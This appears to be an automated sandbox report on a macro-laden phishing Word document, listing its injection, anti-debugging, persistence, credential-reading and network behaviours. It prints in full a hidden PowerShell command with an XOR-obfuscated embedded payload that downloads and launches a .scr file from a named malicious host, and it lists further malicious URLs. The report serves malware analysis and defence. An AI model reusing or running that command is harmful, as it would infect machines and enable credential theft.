|
|
5/5
|
File System
|
Modifies operating system directory
|
-
|
|
|
-
Creates file "\??\C:\Windows\SysWOW64\ntdll.dll" in the OS directory.
|
|
|
-
Modifies file "\??\C:\Windows\SysWOW64\ntdll.dll" in the OS directory.
|
|
|
-
Creates file "\??\C:\Windows\SysWOW64\systray.exe" in the OS directory.
|
|
|
-
Modifies file "\??\C:\Windows\SysWOW64\systray.exe" in the OS directory.
|
|
|
-
Creates file "\??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" in the OS directory.
|
|
|
-
Modifies file "\??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" in the OS directory.
|
|
|
-
Creates file "\??\C:\Windows\System32\drivers\etc\hosts" in the OS directory.
|
|
|
-
Modifies file "\??\C:\Windows\System32\drivers\etc\hosts" in the OS directory.
|
|
|
5/5
|
Anti Analysis
|
Tries to detect kernel debugger
|
-
|
|
|
-
Check via API "NtQuerySystemInformation".
|
|
|
5/5
|
Anti Analysis
|
Makes undocumented API calls to possibly evade hooking based sandboxes
|
-
|
|
|
-
Undocumented API "CreateProcessInternalW" was used to start "C:\Windows\SysWOW64\lsm.exe".
|
|
|
-
Undocumented API "CreateProcessInternalW" was used to start "C:\Windows\SysWOW64\wuauclt.exe".
|
|
|
-
Undocumented API "CreateProcessInternalW" was used to start "C:\Windows\SysWOW64\systray.exe".
|
|
|
-
Undocumented API "CreateProcessInternalW" was used to start "C:\Windows\SysWOW64\cmd.exe".
|
|
|
-
Undocumented API "CreateProcessInternalW" was used to start "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe".
|
|
|
5/5
|
File System
|
Creates an unusually large number of files
|
-
|
|
|
-
Creates an unusually large number of files.
|
|
|
5/5
|
Anti Analysis
|
Makes direct system call to possibly evade hooking based sandboxes
|
-
|
|
|
-
Makes a direct system call to "NtQuerySystemInformation".
|
|
|
-
Makes a direct system call to "NtQueryInformationProcess".
|
|
|
-
Makes a direct system call to "NtAllocateVirtualMemory".
|
|
|
-
Makes a direct system call to "NtFreeVirtualMemory".
|
|
|
-
Makes a direct system call to "NtOpenProcessToken".
|
|
|
-
Makes a direct system call to "NtAdjustPrivilegesToken".
|
|
|
-
Makes a direct system call to "NtClose".
|
|
|
-
Makes a direct system call to "NtCreateSection".
|
|
|
-
Makes a direct system call to "NtMapViewOfSection".
|
|
|
-
Makes a direct system call to "NtOpenProcess".
|
|
|
-
Makes a direct system call to "NtQueryInformationToken".
|
|
|
-
Makes a direct system call to "NtProtectVirtualMemory".
|
|
|
-
Makes a direct system call to "NtCreateFile".
|
|
|
-
Makes a direct system call to "NtQueryInformationFile".
|
|
|
-
Makes a direct system call to "NtDelayExecution".
|
|
|
-
Makes a direct system call to "NtReadVirtualMemory".
|
|
|
-
Makes a direct system call to "NtOpenThread".
|
|
|
-
Makes a direct system call to "NtReadFile".
|
|
|
-
Makes a direct system call to "NtUnmapViewOfSection".
|
|
|
-
Makes a direct system call to "NtResumeThread".
|
|
|
-
Makes a direct system call to "NtOpenDirectoryObject".
|
|
|
-
Makes a direct system call to "NtCreateMutant".
|
|
|
-
Makes a direct system call to "NtWaitForSingleObject".
|
|
|
-
Makes a direct system call to "NtCreateKey".
|
|
|
-
Makes a direct system call to "NtQueryValueKey".
|
|
|
-
Makes a direct system call to "NtSetValueKey".
|
|
|
-
Makes a direct system call to "NtSetInformationFile".
|
|
|
-
Makes a direct system call to "NtWriteFile".
|
|
|
-
Makes a direct system call to "NtEnumerateKey".
|
|
|
-
Makes a direct system call to "NtEnumerateValueKey".
|
|
|
5/5
|
Injection
|
Writes into the memory of another running process
|
-
|
|
|
-
"c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe" modifies memory of "c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe"
|
|
|
-
"c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe" modifies memory of "c:\windows\explorer.exe"
|
|
|
-
"c:\windows\syswow64\systray.exe" modifies memory of "c:\windows\explorer.exe"
|
|
|
-
"c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe" modifies memory of "c:\windows\syswow64\systray.exe"
|
|
|
-
"c:\windows\syswow64\systray.exe" modifies memory of "c:\program files (x86)\mozilla firefox\firefox.exe"
|
|
|
5/5
|
Injection
|
Modifies control flow of another process
|
-
|
|
|
-
"c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe" alters context of "c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe"
|
|
|
-
"c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe" alters context of "c:\windows\explorer.exe"
|
|
|
-
"c:\windows\syswow64\systray.exe" alters context of "c:\windows\explorer.exe"
|
|
|
4/5
|
Process
|
Creates process
|
-
|
|
|
-
Creates process "powershell.exe -windowstyle hidden -noprofile
function n47f6 {
param($d17d93)
$qfab72a = 'w6788';
$o14135a = '';
for ($i = 0; $i -lt $d17d93.length; $i+=2) {
$eb44f = [convert]::ToByte($d17d93.Substring($i, 2), 16);
$o14135a += [char]($eb44f -bxor $qfab72a[($i / 2) % $qfab72a.length]);
}
return $o14135a;
}
$sf6669 = '02455e565f57654e4b4c125b0c353202455e565f57654e4b4c125b196a4d19425e555d597f594c5d0559476b5d05405e5b5d040d3a324802545b515b57555b594b0416590b0b11550035320c3b3d18185716171818576d7354543e5b47574a031e15535d055852540b45141e65357d16171818571617184802545b515b574543594c1e55175d4003534556183e5843684c0516705d4c2744585b791352455d4b041e7e564c27424518503a59534d54121a174b4c055f595f180744585b76165b5211037a3c17181857161718182c725b54711a46584a4c5f145c5d4a19535b0b0a551f6a35325716171818571617484d155a5e5b180442564c51141652404c12445918711942674c4a577a58595c3b5f554a59054f1f4b4c055f595f1819575a5d114c3b3d18185716171818576d7354543e5b47574a031e15535d055852540b45141e65357d16171818571617184802545b515b574543594c1e55175d4003534556181559585418215f454c4d165a674a570353544c103e5843684c05165b48791352455d4b041a176d711942674c4a5752406b510d531b184d1e5843185e1b78524f680559435d5b031a17574d031642515603165b485e1b795b5c680559435d5b031f0c35325716171818571617637c1b5a7e5548184443101a3c5345565d1b0505165c1b5a1514183258434a4127595e564c570b171a6a035a7a574e127b525557054f15141824534374590442724a4a184417051811575b4b5d5e6b3a321857161718185716444c59035f54185d0f42524a56574058515c577b584e5d3a535a574a0e1e7e564c274245185c12454314183e5843684c0516444a5b5b165e564c57455e425d5e0d3a32357d16171818571617184802545b515b574543594c1e55175156031654010a1102545b105e3b3d18185716171818574d3a321857161718185716171818577f594c68034417555d1350005a5d570b17745716527b515a05574541101902005e0e5f14060e0d1502030d094600060b0d1603551a115e0d3a321857161718185716171818575f5118101a53535e0f1553170505577f594c68034419625d05591e35325716171818571617181857164c35325716171818571617181857161718185744524c4d05581709037a3c171818571617181857161718457a3c3a321857161718185716171818577f594c680344175d5b12555418055771524c68055954795c1344524b4b5f5b525c5e40545214181902005e0e5f14040e0d1502030d094154060c0d40030e0f59435206090d4703050c59551f1e03357d161718185716171818571617515e571e525b5d1455170505577f594c68034419625d05591e35325716171818571617181857164c35325716171818571617181857161718185744524c4d05581709037a3c171818571617181857161718457a3c3a32185716171818571617181857637e564c274245185c00655e425d570b17106d3e5843684c051f0203357d1617181857161718185716174d51194217625d0559170518470d3a321857161718185716171818575f51181056605e4a4c02575b684a1842525b4c5f53545d5b141a175c4f245f4d5d1457064f0c085b16584d4c576c524a575e1f3a321857161718185716171818574d3a32185716171818571617181857161718180553434d4a19160603357d16171818571617181857161745357d1617181857161718185716177a4103536c65182757435b50570b174318474e04091457064f5e5e5b1607400147164a03357d16171818571617181857161771560366434a1802585a59561651525c68185f594c5d05160a187516444450591b1876545418557f7f541854565410441f0c35325716171818571617181857167a594a045e56541634594741102757435b505b1607141802585a59561651525c68185f594c5d051a170b114c3b3d1818571617181857161718183a59415d75125b584a415f58524f183e5843684c051e525b5d1455196c573e58430e0c5f1f171318474e070809151f1b184d195b56565910535368571e58435d4a5b160411037a3c1718185716171818571617184a1242424a5657060c3532571617181857161745357d3f3e484d155a5e5b180442564c511416444c4a1e585018564301510e1004424551561016444c4a3e581e3532571617181857161743357d3f3e314b03445e565f5745010f0e150f1705185541010f004f140c3532571617181857161718185716444c4a1e5850184b1257010e01570b176b4c055f595f16325b474c414c3b3d18185716171818571617181811594518101e58431851570b170803575f1704180442457156597a52565f035e0c1851571d0a180a5e3b3d1818571617181857161718180c3b3d181857161718185716171818571617185a0e42521854440303000d570b177b571940524a4c5962587a4103531f4b4c057f59166b0254444c4a1e585010515b1605111457070111037a3c171818571617181857161718185716174b5d16000101185c0b17105b1f574511101b05020c00421669184b4101015a012c1e5e181757041e181d5745010f0e150f19745d19514350655e0d3a321857161718185716171818574b3a32357d1617181857161718185716174a5d03434556180453560e0e4e0d3a3218571617181857164a35320a';
$sf66692 = n47f6($sf6669);
Add-Type -TypeDefinition $sf66692;
[n33fc7]::c92f4cc();
Start-Sleep -s 1;
$y8cf5 = $env:APPDATA;
$t228f7 = $y8cf5 + '\\z79473a.exe';
If (test-path $t228f7) {Remove-Item $t228f7};
$da2f925 = New-Object System.Net.WebClient;
$da2f925.Headers['User-Agent'] = 'da2f925';
$da2f925.DownloadFile('http://jadema.com.py/jj/2019 Order File TTYYUGH.scr', $t228f7);
Start-Process -Filepath $t228f7;
".
|
|
|
-
Creates process ""C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline"".
|
|
|
-
Creates process "C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe".
|
|
|
-
Creates process "C:\Users\aETAdzjz\AppData\Local\Temp\62890218\fsk.exe".
|
|
|
-
Creates process "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe".
|
|
|
-
Creates process "C:\Windows\SysWOW64\lsm.exe".
|
|
|
-
Creates process "C:\Windows\SysWOW64\wuauclt.exe".
|
|
|
-
Creates process "C:\Windows\SysWOW64\systray.exe".
|
|
|
-
Creates process "C:\Windows\SysWOW64\cmd.exe".
|
|
|
-
Creates process "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe".
|
|
|
4/5
|
Process
|
Creates an unusally large number of processes
|
-
|
|
|
-
Above average number of processes were monitored.
|
|
|
4/5
|
Process
|
Reads from memory of another process
|
-
|
|
|
-
"c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe" reads from "c:\windows\explorer.exe".
|
|
|
-
"c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe" reads from "c:\windows\syswow64\systray.exe".
|
|
|
-
"c:\windows\syswow64\systray.exe" reads from "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe".
|
|
|
4/5
|
Network
|
Reads network configuration
|
-
|
|
|
-
Reads the current network configuration through the host.conf file.
|
|
|
4/5
|
Network
|
Downloads data
|
Downloader
|
|
|
-
URL "http://jadema.com.py/jj/2019%20Order%20File%20TTYYUGH.scr".
|
|
|
-
URL "http://www.kitetou.com/j0g2z5t/?MRX4IZ0=1ta0u+itrrAJehBQ4dNhYDNYY/Q9dKySqWg9v+Re6ggZfnmWT/IWZMLldMwHqth8UHaPj5jYW70=&Bx=Et88VVcXZ8Ohw".
|
|
|
3/5
|
Network
|
Performs DNS request
|
-
|
|
|
-
Resolves host name "jadema.com.py".
|
|
|
-
Resolves host name "www.melvelazco.biz".
|
|
|
-
Resolves host name "www.loscaballerosdelzodiaco.net".
|
|
|
-
Resolves host name "www.kitetou.com".
|
|
|
3/5
|
Anti Analysis
|
Delays execution
|
-
|
|
|
-
One thread sleeps more than 5 minutes.
|
|
|
3/5
|
Persistence
|
Installs system startup script or application
|
-
|
|
|
-
Adds "C:\Program Files (x86)\Lihhl\services3f4.exe" to Windows startup via registry.
|
|
|
3/5
|
Browser
|
Reads data related to saved browser credentials
|
-
|
|
|
-
Reads saved credentials for "Google Chrome".
|
|
|
3/5
|
Network
|
Connects to remote host
|
-
|
|
|
-
Outgoing TCP connection to host "192.185.73.158:80".
|
|
|
-
Outgoing TCP connection to host "146.66.85.39:80".
|
|
|
3/5
|
PE
|
Executes dropped PE file
|
-
|
|
|
-
Executes dropped file "fsk.exe".
|
|
|
3/5
|
YARA
|
YARA match
|
-
|
|
|
-
Rule "VBA_Download_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\2019 Order File TTYYUGH.doc"
|
|
|
-
Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\2019 Order File TTYYUGH.doc"
|
|
|
-
Rule "VBA_Obfuscation_ObjectName" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\2019 Order File TTYYUGH.doc"
|
|
|
2/5
|
Anti Analysis
|
Tries to detect debugger
|
-
|
|
|
-
Check via API "IsDebuggerPresent".
|
|
|
-
Check via API "NtQueryInformationProcess".
|
|
|
2/5
|
Static
|
Possible phishing document
|
-
|
|
|
-
Document "C:\Users\aETAdzjz\Desktop\2019 Order File TTYYUGH.doc" shows characteristics of a phishing document.
|
|
|
2/5
|
Network
|
Associated with known malicious/suspicious URLs
|
-
|
|
|
-
URL "http://jadema.com.py/jj/2019%20Order%20File%20TTYYUGH.scr" is known as malicious URL.
|
|
|
-
URL "jadema.com.py" is known as malicious URL.
|
|
|
2/5
|
Network
|
Connects to HTTP server
|
-
|
|
|
-
URL "jadema.com.py/jj/2019%20Order%20File%20TTYYUGH.scr".
|
|
|
-
URL "www.kitetou.com/j0g2z5t/?MRX4IZ0=1ta0u+itrrAJehBQ4dNhYDNYY/Q9dKySqWg9v+Re6ggZfnmWT/IWZMLldMwHqth8UHaPj5jYW70=&Bx=Et88VVcXZ8Ohw".
|
|
|
2/5
|
PE
|
Drops PE file
|
Dropper
|
|
|
|
|
|
-
Drops file "C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll".
|
|
|
2/5
|
VBA Macro
|
Executes macro on specific worksheet event
|
-
|
|
|
-
Executes macro automatically on target "document" and event "open".
|
|
|
2/5
|
VBA Macro
|
Creates suspicious COM object
|
-
|
|
|
-
CreateObject("MSXML2.ServerXMLHTTP")
|
|
|
-
CreateObject(v6c45839c88("938F9FAEA5ACB06A8FA4A1A8A8"))
|
|
|
1/5
|
Process
|
Creates system object
|
-
|
|
|
-
Creates mutex with name "Global\.net clr networking".
|
|
|
-
Creates mutex with name "598MPR44-CZEWG7B".
|
|
|
-
Creates mutex with name "9468738FSVT1AWZz".
|
|
|
-
Creates mutex with name "S-1-5-21-2345716-11203441957301".
|
|
|
1/5
|
Process
|
Overwrites code
|
-
|
|
|
-
Overwrites code to possibly hide behavior.
|
|
|
1/5
|
Static
|
Unparsable sections in file
|
-
|
|
|
-
Static analyzer was unable to completely parse the analyzed file: C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll.
|
|
|
1/5
|
Static
|
Contains suspicious meta data
|
-
|
|
|
-
Office document contains below average content data.
|
|
|
1/5
|
VBA Macro
|
Contains Office macro
|
-
|
|
|
-
Office document contains a VBA macro.
|
